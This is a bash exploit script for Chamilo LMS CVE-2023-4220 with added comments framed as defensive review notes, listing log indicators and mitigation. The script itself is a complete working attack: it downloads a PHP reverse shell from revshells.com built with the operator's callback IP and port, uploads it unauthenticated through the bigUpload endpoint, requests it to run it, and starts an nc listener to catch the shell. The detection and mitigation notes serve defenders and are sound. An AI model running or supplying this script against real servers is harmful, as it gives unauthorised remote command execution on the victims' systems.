#!/bin/bash
# Exploit Title : Chamilo LMS CVE-2023-4220 Exploit
# Date : 11/28/2023
# Exploit Author : Ziad Sakr (@Ziad-Sakr) and Enhancements by Divine Clown
# Version : ≤v1.11.24
# CVE : 2023-4220
# CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2023-4220
# Overview (reviewer notes, defensive reading): the script takes three
# options (-i callback address, -p callback port, -h base URL of a Chamilo
# install), fetches a PHP file from a third-party site, uploads it through
# the bigUpload endpoint without sending any credentials or session cookie,
# requests the uploaded file, and then waits on a local listener.
#
# What defenders can look for, based on the requests made below:
#   - POST requests to .../bigupload/inc/bigUpload.php carrying
#     action=post-unsupported in the web-server access log;
#   - files with a .php extension under .../bigupload/files/;
#   - a GET for such a file shortly after the POST, and outbound
#     connections opened by the web-server/PHP process.
# Mitigation: upgrade past the affected versions named in the header, and
# configure the web server so that nothing under the upload directory is
# executed as PHP.
#
# Initialize variables with default values (empty means "not supplied")
attacker_ip=""
port=""
host_link=""
# Parse command-line options: -i, -p and -h each take an argument.
# NOTE(review): the optstring has no leading ':', so getopts reports a
# missing argument as '?' and the ':' arm below is never reached. Both arms
# exit 1 and the script itself prints no usage text.
while getopts "i:p:h:" opt; do
case $opt in
i)
attacker_ip=$OPTARG
;;
p)
port=$OPTARG
;;
h)
host_link=$OPTARG
;;
\?)
exit 1
;;
:)
exit 1
;;
esac
done
# Check if all required options are provided; any empty value ends the run
# with status 1 and no message saying which option is missing.
if [ -z "$attacker_ip" ] || [ -z "$port" ] || [ -z "$host_link" ]; then
exit 1
fi
# Fetch the PHP file from revshells.com and save it under a fixed name.
# NOTE(review): $attacker_ip and $port go into the query string without
# validation or URL-encoding; -s hides transfer errors and curl's exit status
# is ignored, so a failed or unexpected response is uploaded as-is; and
# $reverse_file is unquoted. The content comes from a third party and is
# never inspected before use, which is a supply-chain risk for the operator.
reverse_file="reverse_shell.php"
exploit_url="https://www.revshells.com/PHP%20PentestMonkey?ip=$attacker_ip&port=$port&shell=bash&encoding=bash"
curl -sL "$exploit_url" -o $reverse_file
# Multipart POST of the file in form field bigUploadFile. The response is
# discarded, so the script cannot tell whether the upload was accepted.
# The fixed name reverse_shell.php is a simple indicator in logs and on disk.
curl -s -F "bigUploadFile=@$reverse_file" "$host_link/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported" > /dev/null
# Request the uploaded file from the files/ directory in the background;
# output is discarded. If the server executes PHP from that directory, this
# request is what runs the uploaded code.
curl -s "$host_link/main/inc/lib/javascript/bigupload/files/$reverse_file" > /dev/null &
# Start the Netcat listener on the chosen port ($port is unquoted).
# NOTE(review): nothing in this script removes the uploaded file, so it stays
# on the server until it is deleted; responders should check the files/
# directory for leftovers.
nc -lnvp $port